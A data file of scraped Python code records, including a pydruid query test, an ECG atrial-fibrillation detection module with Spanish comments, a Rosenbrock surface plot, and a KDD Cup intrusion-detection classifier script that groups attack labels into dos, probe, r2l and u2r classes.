"apps.hello.models.Person.objects.first", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.hello.models.Person.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "apps.hello.models.Person", "line_number": 15, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings.BASE_DIR", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.core.files.uploadedfile.SimpleUploadedFile", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 31, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 31, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 33, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 33, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 33, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 42, "usage_type": "name"}, {"api_name": "django.core.files.uploadedfile.SimpleUploadedFile", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "django.test.utils.override_settings", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_TEST_ROOT", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "168907501", "text": "import os\nimport pytest\nfrom pydruid.client import PyDruid\nfrom pydruid.utils.aggregators import doublesum\nfrom pydruid.utils.filters import 
Dimension\n\nclass TestCube:\n    def test_cube_query(self):\n    \tquery = PyDruid(\"http://pipeline.qiniu.com\", 'v2/stream/cubes/query')\n    \tquery.set_qiniu(\"\", \"\")\n    \ttop = query.topn(\n    \t\t\tdatasource='domain_top_statics',\n    \t\t\tgranularity='all',\n    \t\t\tintervals='2019-08-13/pt1h',  # a one-hour interval starting 2019-08-13 (UTC)\n    \t\t\taggregations={'count': doublesum('count')},\n    \t\t\tmetric='count',\n    \t\t\tdimension='Country',\n    \t\t\tthreshold=10)\n    \tdf = top.export_pandas()\n    \tprint(df)\n    \ttop.export_tsv('top.tsv')\n    \n", "sub_path": "tests/test_qiniu.py", "file_name": "test_qiniu.py", "file_ext": "py", "file_size_in_byte": 665, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pydruid.client.PyDruid", "line_number": 9, "usage_type": "call"}, {"api_name": "pydruid.utils.aggregators.doublesum", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "653101139", "text": "# This script helps to plot ECG signals. \n\nimport pandas as pd\nfrom plotly import graph_objs\nfrom plotly import tools\nfrom plotly.offline import plot\nfrom django.conf import settings\n\nfrom scipy import signal\nfrom scipy.signal import find_peaks_cwt\nfrom numpy import polyfit\nimport numpy as np\nimport math\n\nfrom .detect_peaks import detect_peaks\n\ndef frange(x, y, jump):\n    '''\n    Builds the sequence of block boundaries used to split\n    the signal into blocks of jump seconds\n    '''\n    while x < y:\n        yield x\n        x += jump\n\n\ndef signal_processing(file_name, divide_plots=False):\n\n    print('***************************************************')\n    print('---------------------------------------------------')\n\n    ## ---------------- Event PLOTS data ---------------\n    tiempos_plots = []\n    bpm_plots = []\n    x_plots = []\n    y_plots = []\n    rrmean_values_plots = []\n    rr_variability_plots = []\n    rrmean_plots = []\n    rr_variabilitysum_plots = []\n\n    ## ---------------- Load the signal -----------------\n    path = '/data/'\n    df = pd.read_csv(settings.MEDIA_ROOT+path+file_name)\n\n    try:\n        x=df['X']\n        y=df['Y']\n    except:\n        df = pd.read_csv(settings.MEDIA_ROOT+path+file_name, sep=';')\n\n        x=df['X']\n        y=df['Y']\n    \n    # Sampling frequency\n    Fs = 300\n    rateBPM = 60\n\n    ## ---------- CONDITIONING OF THE X VALUES ----------\n    # Divided by 1000, because that is how the values are given\n    x = np.array(x)\n    y = np.array(y)\n    # To start at second 5\n    try:\n        x = x[1500:10000]\n        y = y[1500:10000]\n    except:\n        pass\n    x = (x/1000.0)-1 # To start from 0 seconds\n    y = y/1000.0\n    \n    # Start of the sample (seconds)\n    x_inicio1 = x[0]\n    x_decimal = x_inicio1-math.floor(x_inicio1)\n    x_inicio = (x_decimal * 0.999) / 0.299 + math.floor(x_inicio1) \n    # End of the sample (seconds)\n    x_final1 = x[-1]\n    x_decimal_fin = x_final1 - math.floor(x_final1)\n    x_final = (x_decimal_fin * 0.999) / 0.299 + math.floor(x_final1) \n    \n    # Total TIME of the SIGNAL\n    tiempo_total = x_final - x_inicio\n\n    # Build the x axis (seconds) (THIS IS WHAT WE PROCESS)\n    t = np.linspace(x_inicio, x_final, y.size, endpoint=True)\n    # The Y for the PLOT (y_final)\n    y_final = []\n\n    ## -------------------- Data ---------------------\n    # BPM (beats per MINUTE (60 seconds))\n    taquicardia = 100.0 # Greater than\n    bradicardia = 60.0 # Less than\n    # PEAK separation (1 Hz - 1.667 Hz (2 Hz))\n    taquicardia_seg = 60/taquicardia # Less than 0.6 seconds\n    bradicardia_seg = 60/bradicardia # Greater than 1.0 seconds\n    # In milliseconds\n    taquicardia_mili = 600.0 # Less than 600 milliseconds\n    bradicardia_mili = 1000.0 # Greater 
than 1000 milliseconds\n\n    ## ------------- BIT CONVERSION --------------- \n    num_bits = 12.0\n    max_volt = 3.3\n    y = (max_volt * y)/(2**int(num_bits))\n    #--------------------------------------------------\n\n    ## --------------- PROCESSING -----------------\n    # Above 10 seconds (total time)\n    segundos_bloque = 15.0\n    sobra_bloque = tiempo_total/segundos_bloque\n    bloques = list(frange(x_inicio, x_final, segundos_bloque))\n\n    # figure counter\n    cont_fig = 2\n\n    # last loop\n    last_loop = False\n\n    # For R-R\n    rr_values_all = []\n    rr_values_all_plot = []\n    rr_mean_values_all = []\n    rrmean_values = []\n    rr_mean_prom = 0\n    rr_up_mean_values_all = []\n    rr_down_mean_values_all = []\n    RRv_all = []\n    RRv_all_plot=[]\n    rr_mean = 0\n    RRv_suma_all = []\n\n    # To know whether to plot the last part\n    ploteosiono = False\n\n    y_peaks=[]\n    t_peaks = []\n    picos_todos = []\n    \n    ## Result\n    values = {'FA': False, 'ARRITMIA': False, 'ARRITMIA_GENERAL': False}\n    values['suficiente_tiempo'] = True\n\n    # PROCESSING:\n    if tiempo_total > segundos_bloque: # Above 10 seconds (total time)\n        for i in bloques:\n            # AVOID a block shorter than 5 seconds\n            ultimate_i = i + segundos_bloque # Next block\n            if (ultimate_i < x_final) and ((x_final-ultimate_i) < (segundos_bloque/2)):\n\n                # BLOCK data\n                indice_mayores = (i <= t) \n                t_bloque_parcial = t[indice_mayores] # For t\n                y_bloque_parcial = y[indice_mayores] # For y\n                indice_menores = (t_bloque_parcial <= x_final)\n                t_bloque = t_bloque_parcial[indice_menores] # For t\n                y_bloque = y_bloque_parcial[indice_menores] # For y\n                \n\n                last_loop = True\n            else:\n                # BLOCK data\n                indice_mayores = (i <= t)\n                t_bloque_parcial = t[indice_mayores] # For t\n                y_bloque_parcial = y[indice_mayores] # For y\n                indice_menores = (t_bloque_parcial <= (i + segundos_bloque))\n                t_bloque = t_bloque_parcial[indice_menores] # For t\n                y_bloque = y_bloque_parcial[indice_menores] # For y\n\n            \n            # Savitzky-Golay filter to reduce noise (y_smooth)\n            order_sgolay = 7\n            framelen = 21\n            # Make sure y_bloque has more samples than framelen\n            if not(len(y_bloque) > framelen):\n                order_sgolay = len(y_bloque)-2\n                framelen = len(y_bloque)-1\n            # Only if it is odd: order_sgolay < framelen\n            if (framelen%2) != 1:\n                order_sgolay = order_sgolay-1;\n                framelen = framelen-1\n                print('Se cambio el orden de Savitzky Golay\\n')\n            \n            y_smooth = signal.savgol_filter(y_bloque, framelen, order_sgolay)\n            \n\n            # DETREND (remove the signal's trend) (y_detrend)\n            p = polyfit((np.arange(len(y_smooth))),y_smooth,6)\n            f_y = np.polyval(p,(np.arange(len(y_smooth))))\n            y_detrend = y_smooth - f_y\n\n\n            # MULTIPLICATION by itself\n            y_var = y_detrend * y_detrend\n            y_var = y_var * 100 # 10 (value in millivolts)\n            y_normal = y_var\n\n\n            # PEAK DETECTION\n            y_max = max(y_normal)\n\n            # minimum threshold for a signal peak\n            min_peak_value = y_max*0.4\n            \n            # minimum peak threshold (THEORETICAL)\n            min_peak_value_theory = 0.2\n            # Peaks must always be greater than 0.29\n            if not(min_peak_value >= min_peak_value_theory):\n                print('El pico minimio es menor a '+str(min_peak_value_theory))\n                min_peak_value = min_peak_value_theory\n            # Peaks: values\n            index_peaks = detect_peaks(y_normal, mph=min_peak_value, mpd=0.3, show=True) # first value tried 0.150\n            \n            if len(index_peaks) == 0:\n                break \n            t_peaks = t_bloque[index_peaks] \n            y_peaks = y_normal[index_peaks]\n\n            # Collect all the peaks:\n            for peak in y_peaks:\n                picos_todos.append(peak)\n            \n            # RR-VARIABILITY\n            RRv_suma = 0\n            RRv_variamucho = 
False\n            minimo_variacion = 0.6 ##CHANGE? fine for now 0.6  1.5\n            porcentaje_prematuridad = 0.78\n\n            # RR - INTERVALS\n            rr_values = []\n            rr_promedio = 0\n            RRv_suma_porcentaje = []\n            # RR-MEAN\n            fuerade_rrmean = False\n\n            # MINIMUM of 10 peaks\n            if (len(y_peaks)> 9):\n                # RR - VARIABILITY\n                for i2 in range(len(y_peaks)-2):\n                    # There should be no variation (RRv = 0)\n                    RRv21 = (t_peaks[i2+1]-t_peaks[i2])\n                    RRv32 = (t_peaks[i2+2]-t_peaks[i2+1])\n                    RRv_suma = RRv_suma + abs(RRv32 - RRv21)\n                    RRv_suma_all.append(abs(RRv32 - RRv21)) #Plots\n\n                    # Percentage\n                    if (1-(abs(RRv21-RRv32)/(RRv21))):\n                        RRv_suma_porcentaje.append(abs(RRv32 - RRv21))\n\n                if RRv_suma > minimo_variacion:\n                    RRv_variamucho = True\n                \n\n                # RR - INTERVALS (seconds)\n                for i3 in range(1,len(t_peaks)):\n                    # store the RR interval value\n                    pulso_ant = t_peaks[i3-1]\n                    pulso_act = t_peaks[i3]\n                    rr_values.append(pulso_act - pulso_ant)\n                \n                # RRv for the plot!!\n                RRv_hahas = [RRv_suma]*len(rr_values) ## REVIEW, UNCOMMENT\n                #RRv_hahas = RRv_suma_sola*len(rr_values) \n                for RRv_haha in RRv_hahas:\n                    RRv_all.append(RRv_haha)\n                \n                \n                rr_suma = sum(rr_values)\n                rr_promedio = sum(rr_values)/len(t_peaks)\n                \n                # Append to the overall rr_values\n                for rr_val in rr_values: ## REVIEW!!\n                    rr_values_all.append(rr_val)\n                \n                # MEAN R-R Interval (uses the rr_values above)\n                rr_mean = 0\n                for i4 in range(0,len(rr_values)):\n                    rr_mean = 0.75*rr_mean+0.25*rr_values[i4]\n                rrmean_values = [rr_mean]*len(rr_values)\n                # Append to the overall rr_mean values\n                for rrmean_value in rrmean_values:\n                    rr_mean_values_all.append(rrmean_value)\n\n                # R-R limit values\n                up_rr_true = [] # Values greater than \n                up_mean_rrvalues = [i21 for i21 in rr_values if i21 >= (rr_mean*1.35)] #2.5+0.5 ##THIS STAYS\n                \n                down_rr_true = [] # Values less than \n                down_mean_rrvalues = [i22 for i22 in rr_values if i22 <= (rr_mean*0.85)] #0.1-0.5\n\n                \n                if (len(up_mean_rrvalues) + len(down_mean_rrvalues)) > 1:\n                    fuerade_rrmean = True\n                elif up_mean_rrvalues or down_mean_rrvalues:\n                    fuerade_rrmean = True\n\n\n            # BEATS PER MINUTE\n            rateBPM = len(y_peaks)*60.0/(t_bloque[-1]-t_bloque[0])\n            #print('BPM: '+ str(rateBPM))\n\n            # ---------------- ATRIAL FIBRILLATION ----------------\n            if (fuerade_rrmean==True) and (RRv_variamucho==True):\n                values['FA'] = True\n                tiempos_plots.append([t_bloque[0],t_bloque[-1]])\n                x_plots.append(t_bloque)\n                y_plots.append(y_smooth)\n                rrmean_values_plots.append(rrmean_values)\n                rr_variability_plots.append(rr_values)\n                rr_variabilitysum_plots.append(RRv_suma_all)\n                rrmean_plots.append(rr_mean)\n                bpm_plots.append(rateBPM)\n                values['ARRITMIA_GENERAL'] = True\n            elif (fuerade_rrmean==True):\n                values['ARRITMIA_GENERAL'] = True\n            else:\n                values['FA'] = False\n                values['ARRITMIA'] = False\n\n            # figure counter\n            cont_fig = cont_fig+1\n            \n            # Build the FINAL Y\n            for y_i in y_detrend:\n                y_final.append(y_i)\n\n            # LAST LOOP\n            if last_loop:\n                break\n            \n\n    else:\n        values['suficiente_tiempo'] = False\n        print('No se adquirio suficiente tiempo')\n\n\n    values['rr_mean'] = rr_mean\n    values['up_rr_mean'] = rr_mean*1.15\n    values['down_rr_mean'] = rr_mean*0.85\n\n    values['rateBPM'] = rateBPM\n    values['cycles_num'] = len(picos_todos)\n    values['cycles'] = []\n    cycles = []\n    values['tiempos_plots'] = tiempos_plots\n\n    for i in range(0,len(y_peaks)-1):\n        cycles.append('Intervalo R-R #'+str(i+1)+' - #'+str(i+2) +': '+str(rateBPM))\n    \n    values['cycles'] = cycles\n\n    #--------------------------------------------------\n\n    trace1 = graph_objs.Scatter(\n        x=t, y=y_final, \n        
mode='lines', name='signal'\n    )\n\n    layout = graph_objs.Layout(title='ECG ('+file_name+')',\n                plot_bgcolor='rgb(230, 230,230)')\n    \n\n    ## ----------------- R-R MEAN Interval Plot --------------\n    x_values_mean = range(0, len(rr_values_all))\n    \n    ups_mean = []\n    for rr_up_mean in rr_mean_values_all:\n        ups_mean.append(rr_up_mean*1.35) #2.5+0.5\n    x_values_mean1 = range(0, len(ups_mean))\n\n    downs_mean = []\n    for down_up_mean in rr_mean_values_all:\n        downs_mean.append(down_up_mean*0.85) #0.1-0.5\n    x_values_mean2 = range(0, len(downs_mean))\n    \n    \n    trace2 = graph_objs.Scatter(\n        x=x_values_mean,\n        y=rr_values_all,\n        mode='markers',\n        name='Intervalos MEAN R-R'\n    )\n    trace3 = graph_objs.Scatter(\n        x=x_values_mean1,\n        y=ups_mean,\n        name='Limite MEAN R-R'\n    )\n    \n    trace4 = graph_objs.Scatter(\n        x=x_values_mean2,\n        y=downs_mean,\n        name='Limite MEAN R-R'\n    )\n    # -----------------------------------------------------\n\n    # ----------------R-R Interval Plot--------------------\n    x_values = range(0, len(rr_values_all))\n    x_RRv_suma_all = range(0, len(RRv_suma_all))\n    #rr_values_prom = sum(rr_values_all)/len(rr_values_all)\n    \n    rr_up = [1.1]*len(x_values)#[15]*len(x_values)\n    rr_down = [0]*len(x_values)#[0]*len(x_values)\n\n    trace5 = graph_objs.Scatter(\n        x=x_values,\n        y=RRv_suma_all,#RRv_all,\n        mode='markers',\n        name='Intervalos R-R'\n    )\n    trace6 = graph_objs.Scatter(\n        x=[0, len(x_values)],\n        y=rr_up,#[sum(RRv_all)/len(RRv_all)*1.15, sum(RRv_all)/len(RRv_all)*1.15],#y=rr_up_mean_values_all,\n        name='Limite R-R'\n    )\n    trace7 = graph_objs.Scatter(\n        x=[0, len(x_values)],\n        y=rr_down,#[sum(RRv_all)/len(RRv_all)*0.85, sum(RRv_all)/len(RRv_all)*0.85],#y=[rr_mean_prom*0.85, rr_mean_prom*0.85],\n        name='Limite R-R'\n    )\n    \n    data = [trace1, trace2, trace3, trace4, trace5]\n    fig = tools.make_subplots(rows=3, cols=1, subplot_titles=('ECG', 'R-R Variabilidad'))\n    fig.append_trace(trace1, 1, 1)\n    fig.append_trace(trace2, 2, 1)\n    fig.append_trace(trace3, 2, 1)\n    fig.append_trace(trace4, 2, 1)\n    fig.append_trace(trace5, 3, 1)\n    fig.append_trace(trace6, 3, 1)\n    fig.append_trace(trace7, 3, 1)\n    fig['layout']['xaxis1'].update(title='Segundos', range=[5, 15])\n    fig['layout']['yaxis1'].update(title='Milivoltios')\n    fig['layout']['plot_bgcolor']='rgb(230, 230,230)'\n    fig['layout']['xaxis2'].update(title='Bloques')#, range=[0, len(x_values)] )\n    fig['layout']['yaxis2'].update(title='R-R Intervalos')\n    fig['layout']['xaxis3'].update(title='Bloques')#, range=[0, len(x_values)+5])\n    \n    plot_div = plot(fig, output_type='div', include_plotlyjs=False)\n\n    # If event plots are not required, return 2 values\n    if divide_plots==False:\n        return plot_div, values\n\n    # --------------- Event Plots -----------------\n    event_plots = [] # Event plots\n    plot_cont = 0\n    \n    if len(tiempos_plots) > 0:\n        for tiempos_plot in tiempos_plots:\n            event_trace = graph_objs.Scatter(\n                x=x_plots[plot_cont],\n                y=y_plots[plot_cont],\n                mode='lines',\n                name = 'Evento Arritmico'\n            )\n\n            x_rr_plots = list(range(0, len(rr_variability_plots[plot_cont])))\n            event_trace2 = graph_objs.Scatter(\n                x=x_rr_plots,\n                y=rr_variability_plots[plot_cont],\n                mode='markers',\n                name='Variabilidad R-R'\n            )\n\n            rrmean_up_plots = []\n            rrmean_up_plots.append(rrmean_plots[plot_cont]*1.35)\n            rrmean_up_plots = rrmean_up_plots*len(rr_variability_plots[plot_cont])\n            \n            event_trace3 = graph_objs.Scatter(\n                x=[0, len(rrmean_up_plots)],\n                y=rrmean_up_plots,\n                name='Limite MEAN R-R'\n            )\n            rrmean_down_plots = []\n            rrmean_down_plots.append(rrmean_plots[plot_cont]*0.85)\n            rrmean_down_plots = 
rrmean_down_plots*len(rr_variability_plots[plot_cont])\n \n event_trace4 = graph_objs.Scatter(\n x=[0, len(rrmean_down_plots)],\n y=rrmean_down_plots,\n name='Limite MEAN R-R'\n )\n\n #---------------------------------------------------------\n x_rrv_plots = range(0, len(rr_variabilitysum_plots[plot_cont]))\n rr_up_plots = [0.8]*len(x_rrv_plots)\n event_trace5 = graph_objs.Scatter(\n x=x_rrv_plots[plot_cont],\n y=rr_variabilitysum_plots[plot_cont],\n mode='markers',\n name='Suma de Variabilidad R-R'\n )\n event_trace6 = graph_objs.Scatter(\n x=[0, len(rr_up_plots)],\n y=rr_up_plots,#[sum(RRv_all)/len(RRv_all)*1.15, sum(RRv_all)/len(RRv_all)*1.15],#y=rr_up_mean_values_all,\n name='Limite R-R (propio)'\n )\n\n subplot_titles = ('Evento: del segundo '+ str(int(tiempos_plot[0]))+' - al segundo '+str(int(tiempos_plot[1])), \n 'R-R Variabilidad')\n event_fig = tools.make_subplots(rows=3, cols=1, subplot_titles=subplot_titles)\n event_fig.append_trace(event_trace, 1, 1)\n event_fig.append_trace(event_trace2, 2, 1)\n event_fig.append_trace(event_trace3, 2, 1)\n event_fig.append_trace(event_trace4, 2, 1)\n event_fig.append_trace(event_trace5, 3, 1)\n event_fig.append_trace(event_trace6, 3, 1)\n event_fig['layout']['xaxis1'].update(title='Segundos')\n event_plot = plot(event_fig, output_type='div', include_plotlyjs=False)\n event_plots.append(event_plot)\n plot_cont += 1\n # --------------------------------------------------\n return plot_div, values, event_plots", "sub_path": "apps/information/utils/ecg_plotter.py", "file_name": "ecg_plotter.py", "file_ext": "py", "file_size_in_byte": 18743, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 44, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 44, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 74, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 75, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 78, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 85, "usage_type": "call"}, {"api_name": "scipy.signal.savgol_filter", "line_number": 182, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 182, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "detect_peaks.detect_peaks", "line_number": 210, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 352, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 352, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 357, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 357, "usage_type": 
"name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 375, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 375, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 381, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 381, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 387, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 387, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 402, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 402, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 408, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 408, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 413, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 413, "usage_type": "name"}, {"api_name": "plotly.tools.make_subplots", "line_number": 420, "usage_type": "call"}, {"api_name": "plotly.tools", "line_number": 420, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 435, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 447, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 447, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 455, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 455, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 466, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 466, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 475, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 475, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 484, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 484, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 490, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 490, "usage_type": "name"}, {"api_name": "plotly.tools.make_subplots", "line_number": 498, "usage_type": "call"}, {"api_name": "plotly.tools", "line_number": 498, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 506, "usage_type": "call"}]} +{"seq_id": "390541034", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 30 15:17:43 2017\n\n@author: Mike\n\"\"\"\n\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.pyplot as plt\ndef first(x, y):\n return (100 *(y-x**2)**2 + (1-x)**2)\nx = arange(-6.0,5.0,0.1)\ny = arange(-6.0,5.0,0.1)\nX,Y = meshgrid(x, y) \nZ = first(X, Y)\n'''\nim = imshow(Z,cmap=cm.RdBu) # drawing the function\n# adding the Contour lines with labels\ncset = contour(Z,arange(-1,1.5,0.2),linewidths=2,cmap=cm.Set2)\nplt([1],[1])\nclabel(cset,inline=True,fmt='%1.1f',fontsize=10)\ncolorbar(im) # adding the colobar on the right\n# latex fashion title\ntitle('$z=(1-x^2+y^3) e^{-(x^2+y^2)/2}$')\nshow()\n'''\nfig = plt.figure()\nax = fig.gca(projection='3d')\nsurf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, \n cmap=cm.RdBu,linewidth=0, antialiased=False)\nax.plot([1],[1],'go')\nax.zaxis.set_major_locator(LinearLocator(10))\nax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\nfig.colorbar(surf, shrink=.5, aspect=5)\nplt.show()", "sub_path": "Numerical Optimization 
Problems/first.py", "file_name": "first.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.ticker.LinearLocator", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "132179668", "text": "from sklearn.datasets import fetch_openml\nimport pandas as pd\nimport numpy as np\nimport pickle\n\ndata = '''back dos\nbuffer_overflow u2r\nftp_write r2l\nguess_passwd r2l\nimap r2l\nipsweep probe\nland dos\nloadmodule u2r\nmultihop r2l\nneptune dos\nnmap probe\nperl u2r\nphf r2l\npod dos\nportsweep probe\nrootkit u2r\nsatan probe\nsmurf dos\nspy r2l\nteardrop dos\nwarezclient r2l\nwarezmaster r2l'''\n\n# grouped by type\nattack_types = pd.DataFrame([row.split() for row in data.split('\\n')], columns=['name','type'])\nattack_type_groups = attack_types.groupby('type')['name'].unique()\n\nprint('attack group types: {}'.format(', '.join(attack_type_groups.index)))\nprint()\nprint(attack_type_groups)\n\n#X = features\n#y = label (target)\nfrom sklearn.datasets import fetch_openml\nX, y = fetch_openml(data_id='1113', return_X_y=True, as_frame=True)\nprint('n records: {}'.format(len(X.index)))\nX_preserved = X.copy()\ny_preserved = y.copy()\n\ndef get_attack_type_downsampled_balanced_subset(attack_names, label, X, y):\n print('Attack group name: {}'.format(label))\n print('Attack_types: {}'.format(', '.join(attack_names)))\n \n is_type_attack = y.isin(attack_names)\n \n only_attack_type = y[is_type_attack]\n only_not_attack_type = y[~is_type_attack]\n \n only_attack_type = is_type_attack[is_type_attack]\n only_not_attack_type = is_type_attack[~is_type_attack]\n \n \n num_attack_type = only_attack_type.shape[0]\n num_not_attack_type = only_not_attack_type.shape[0]\n \n print('Num attack type: {}'.format(num_attack_type))\n print('Num not attack type: {}'.format(num_not_attack_type))\n \n\n # Take a balanced sample\n # which one has less? 
that is the one we should downsample\n lowest_count = min(num_attack_type, num_not_attack_type)\n \n balanced_ys = []\n balanced_Xs = []\n for subset_y in [only_attack_type, only_not_attack_type]:\n _subset_y = subset_y.copy()\n if _subset_y.shape[0] > lowest_count:\n _subset_y = subset_y.sample(n=lowest_count)\n subset_X = X.loc[_subset_y.index, :]\n balanced_Xs.append(subset_X)\n balanced_ys.append(_subset_y)\n \n assert len(balanced_Xs) == len(balanced_ys)\n \n for i, balanced_y in enumerate(balanced_ys):\n assert balanced_y.shape[0] == lowest_count\n assert balanced_Xs[i].shape[0] == lowest_count\n \n X_new = pd.concat(balanced_Xs)\n y_new = pd.concat(balanced_ys).rename(label)\n \n print(X_new.shape[0])\n print(y_new.shape[0])\n print()\n \n return X_new, y_new\n\nX_is_dos, y_is_dos = get_attack_type_downsampled_balanced_subset(attack_type_groups['dos'], 'is_dos_attack', X, y)\nX_is_probe, y_is_probe = get_attack_type_downsampled_balanced_subset(attack_type_groups['probe'], 'is_probe_attack', X, y)\nX_is_r2l, y_is_r2l = get_attack_type_downsampled_balanced_subset(attack_type_groups['r2l'], 'is_r2l_attack', X, y)\nX_is_u2r, y_is_u2r = get_attack_type_downsampled_balanced_subset(attack_type_groups['u2r'], 'is_u2r_attack', X, y)\n\nX, y = X_is_probe, y_is_probe\n\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.linear_model import LogisticRegression, RidgeClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report, confusion_matrix\n\n\nnp.random.seed(0)\n\n#column transformer\n\nnumeric_features = ['src_bytes','dst_bytes']\nnumeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())])\n\ncategorical_features = ['protocol_type']\n#categorical_features = []\ncategorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='constant', fill_value='missing')),\n ('onehot', 